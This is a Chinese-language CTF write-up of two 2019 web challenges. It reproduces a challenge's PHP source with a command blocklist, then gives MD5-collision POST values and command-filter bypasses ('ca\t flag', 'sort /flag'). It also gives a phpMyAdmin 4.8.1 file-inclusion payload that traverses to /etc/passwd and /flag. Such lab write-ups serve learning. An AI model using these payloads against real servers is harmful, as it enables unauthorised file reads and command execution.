知识点
sort命令:
-
sort将文件的每一行作为一个单位,相互比较,比较原则是从首字符向后,依次按ASCII码值进行比较,最后将他们按升序输出。
dir命令:
- 显示目录的文件和子目录的列表。
- 详情可见
数据库:
- 可以输入 phpmyadmin 直接查看数据库,可以查看版本等等
- 还学习到了
- phpmyadmin4.8.1后台任意文件包含漏洞
18-1 [安洵杯 2019]easy_web
做题思路
无意中发现了,
然而却不知道如何走,去看看大佬WP
大佬敏感发现 ,img 中的为base64加密,两次 base64 解密后发现
类似于16进制,于是得到
猜测是网页中的那张照片的名字,于是尝试把它删除 ,图片没有了,那么这题应该与文件包含有关系,然后
将 源代码解码后得到
<?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset($_GET['img']) || !isset($_GET['cmd'])) header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='); $file = hex2bin(base64_decode(base64_decode($_GET['img']))); $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file); if (preg_match("/flag/i", $file)) { echo '<img src ="./ctf3.jpeg">'; die("xixi~ no flag"); } else { $txt = base64_encode(file_get_contents($file)); echo "<img src='data:image/gif;base64," . $txt . "'></img>"; echo "<br>"; } echo $cmd; echo "<br>"; if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) { echo("forbid ~"); echo "<br>"; } else { if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo ("md5 is funny ~"); } } ?> <html> <style> body{ background:url(./bj.png) no-repeat center center; background-size:cover; background-attachment:fixed; background-color:#CCCCCC; } </style> <body> </body> </html>
- 上述代码首先判断img和cmd参数是否为空,为空是跳转到原先的首页,不为空,然后判断img参数,和我们之前分析的一样,解码后读取文件,然后正则过滤其中非字母数字字符,并判断img中不含
flag
后,将该文件内容的base64编码放到源码相应位置。当然,这个主要可以帮助我们得到index.php的源码。- 然后判断cmd,过滤其中很多指令,然后进行MD5的一个判断,如果绕过成功,则会执行指令。
post 输入a和b得值,有一个MD5强绕过,解法如下:
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
过滤了ls,可以用dir //不知道为啥我的成这样没有目录
按照思路是当前目录没有找到flag,便 dir%20/ 查看根目录
然后读取flag
方法一
ca\t%20flag
这样绕过,虽然源码过滤了\
,但是这里还是可以使用。方法二
sort命令:sort将文件的每一行作为一个单位,相互比较,比较原则是从首字符向后,依次按ASCII码值进行比较,最后将他们按升序输出。
sort%20/flag
18-2 [GWCTF 2019]我有一个数据库
dirsearch 扫到了 phpmyadmin ,进去看看
查看版本,
百度搜索对应的漏洞
可以发现在index.php里
include $_REQUEST['target'];
文献2中可以看到
target=db_datadict.php%253f/../../../../../../../../etc/passwd
绕过所有的检查
于是直接 把最后的改成 flag 成功得到flag
target=db_datadict.php%253f/../../../../../../../../flag